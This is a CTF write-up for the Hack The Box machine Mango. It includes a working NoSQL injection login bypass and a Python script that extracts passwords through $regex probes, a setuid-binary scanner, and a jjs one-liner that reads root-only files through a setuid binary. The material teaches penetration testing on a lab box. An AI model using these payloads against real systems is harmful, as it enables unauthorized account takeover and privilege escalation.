This is a writeup for the Mango machine from Hack The Box.

Hack The Box is an online platform to improve your penetration testing skills and exchange ideas and methodologies with thousands of people in the security field.

Overview:

NoSQL injection for user, setuid jjs for privilege escalation to root.

Part1: Getting User

Recon:

Whenever I get an IP, I start with an nmap scan and save the output in my nmap directory, so here it is:

nmap -sC -sV -oA nmap/mango 10.10.10.162

The output is:

nmap result for mango

Port 443: the common name in the TLS certificate caught my attention, so I added it to my /etc/hosts file, opened it in the browser and got a login page.

NoSQL Injection:

What is the first thing people do when they get a login page?

Try common usernames and passwords, but they did not work here. Then I tried SQL injection, but no luck 😞

Wait! I forgot to check the type of database. I searched for the Mango inference engine and found this article. Hmm, MongoDB (a NoSQL database). Let's try NoSQL injection. I intercepted the login request with Burp and tried this:

username=admin&password[%24ne]=&login=login

Trying NoSQL injection

The response was a 302. The bracket syntax is parsed into a query operator, so password[$ne]= becomes {"password": {"$ne": ""}}, which matches any user whose password is not the empty string. Let's follow the redirect:

No SQL Injection

So yes, it is NoSQL injection. Without wasting time I wrote a script for NoSQL injection, which you can find here. I tried it for two users, admin and mango (admin as in admin@mango.htb, and mango as the name of the machine).

got a password for mango.

I got the password for mango and, in the same way, the password for admin.
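The following is an added example, written for this page and not the author's script (which is not shown here). It models the injection end to end: a minimal MongoDB-style matcher behind a login function that passes the decoded request body straight into the query, the $ne bypass from above, and the character-by-character password extraction with $regex that such a script performs. The user records, the passwords and the in-process login oracle are constructed for the example; against the real box the oracle would be an HTTPS POST to the login page, treating a 302 as "match".

```python
import re
import string
from urllib.parse import parse_qs, quote

# Constructed sample collection standing in for the box's MongoDB users; not real data.
USERS = [
    {"username": "admin", "password": "S3cr3t!Pass"},
    {"username": "mango", "password": "h3mp-t0p"},
]

def parse_body(body):
    """Build the query the way a PHP/Express-style body parser does:
    'password[$ne]=' becomes {'password': {'$ne': ''}}."""
    query = {}
    for key, values in parse_qs(body, keep_blank_values=True).items():
        m = re.fullmatch(r"(\w+)\[(\$\w+)\]", key)
        if m:
            query.setdefault(m.group(1), {})[m.group(2)] = values[0]
        else:
            query[key] = values[0]
    return query

def mongo_match(doc, query):
    """Tiny subset of MongoDB matching: equality, $ne and $regex."""
    for field, cond in query.items():
        actual = doc.get(field)
        if not isinstance(cond, dict):
            if actual != cond:
                return False
            continue
        for op, arg in cond.items():
            if op == "$ne":
                if actual == arg:
                    return False
            elif op == "$regex":
                if actual is None or re.search(arg, actual) is None:
                    return False
            else:
                raise ValueError("operator not modelled: " + op)
    return True

def login(body):
    """The vulnerable endpoint: the decoded body is used as the query unchanged.
    Returns True where the real application answered with a 302 redirect."""
    query = parse_body(body)
    query.pop("login", None)  # the submit button, not a document field
    return any(mongo_match(user, query) for user in USERS)

CHARSET = string.ascii_letters + string.digits + string.punctuation

def extract_password(oracle, username, charset=CHARSET, max_len=64):
    """Recover `username`'s password one character at a time with anchored $regex probes.
    Returns None when no password of at most max_len characters can be confirmed."""
    known = ""
    for _ in range(max_len):
        for ch in charset:
            pattern = "^" + re.escape(known + ch)
            body = f"username={username}&password[$regex]={quote(pattern, safe='')}&login=login"
            if oracle(body):
                known += ch
                break
        else:
            # Nothing extends the prefix: confirm it is the whole password.
            pattern = "^" + re.escape(known) + "$"
            body = f"username={username}&password[$regex]={quote(pattern, safe='')}&login=login"
            return known if oracle(body) else None
    return known

if __name__ == "__main__":
    print(login("username=admin&password[%24ne]=&login=login"))  # True: the $ne bypass
    for user in ("admin", "mango"):
        print(user, extract_password(login, user))
```

Each probe is URL-encoded with quote() so that characters such as & or + in the guessed prefix cannot break the body; the trailing anchored probe (^...$) is what distinguishes "no longer character matches" from "this is the complete password". Against a live target, replace login() with a function that sends the body to the form and returns True on a 302.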

user.txt:

I logged in as mango over SSH and found that I could not read user.txt: the file is not readable by mango. I switched to admin with the recovered password and read user.txt.

user.txt

Part2: Getting root.txt

Recon:

Whenever I go for root I first run a few standard checks: looking for kernel exploits, pspy, LinEnum and Linux Smart Enumeration (lse.sh). I ran all of these, and the output of lse.sh caught my attention.

./lse.sh -l 1

Whenever I see an uncommon setuid binary I check GTFOBins. I searched for jjs and found a neat way to exploit it.
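As an added example (my own code, not the author's tooling and not lse.sh's logic), here is a small Python scan that performs the check that flagged jjs: list every file with the setuid bit and report those whose name is outside a baseline of binaries that normally carry it. The baseline set and the temporary tree built by demo() are constructed for the example; on a real host you would run uncommon_setuid("/") as the low-privileged user and look up each hit on GTFOBins.

```python
import os
import stat
import tempfile

# Names that normally carry the setuid bit on a stock Ubuntu host (constructed, trimmed list;
# extend it for the target distro). Anything setuid and not in here is worth a GTFOBins lookup.
BASELINE = {
    "sudo", "su", "passwd", "chsh", "chfn", "gpasswd", "newgrp", "mount", "umount",
    "fusermount", "pkexec", "ping", "ssh-keysign", "dbus-daemon-launch-helper",
}

def find_setuid(root):
    """Return (path, owner uid) for every regular file under `root` with the setuid bit set.
    Symlinks are not followed, so link loops and planted links are skipped."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:  # unreadable or vanished entry: keep scanning
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid))
    return hits

def uncommon_setuid(root, baseline=BASELINE):
    """Setuid files whose basename is not in the baseline; root-owned ones (uid 0) matter most,
    because the program runs with the owner's privileges."""
    return [(path, uid) for path, uid in find_setuid(root)
            if os.path.basename(path) not in baseline]

def demo():
    """Build a throwaway tree with a fake setuid jjs, a baseline setuid passwd and a plain ls,
    then scan it. Constructed data standing in for a real filesystem."""
    tmp = tempfile.mkdtemp()
    bindir = os.path.join(tmp, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("jjs", 0o4755), ("passwd", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return [os.path.basename(path) for path, _uid in uncommon_setuid(tmp)]

if __name__ == "__main__":
    print(demo())  # ['jjs']
```

The baseline is the part to maintain: a stock list keeps the noise of sudo, passwd and friends out of the output so that something like a setuid copy of a JDK tool stands out immediately, which is exactly what lse.sh surfaced here.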

root.txt:

After tweaking a bit, I figured out the correct command.

jjs is the Nashorn JavaScript shell shipped with the JDK, and it can call any Java class through Java.type(). Because the binary has the setuid bit, everything the script does runs as root. The first two lines import the BufferedReader and FileReader classes; the third opens /root/root.txt through a buffered reader; the loop reads the file line by line until readLine() returns null and prints each line. The whole script is piped into jjs on standard input.

echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
var line;
while ((line = br.readLine()) != null) { print(line); }' | jjs

Lo and behold, the content of root.txt popped out 😃

root.txt

This was the first time I exploited a NoSQL injection. I hope you learned something from this article.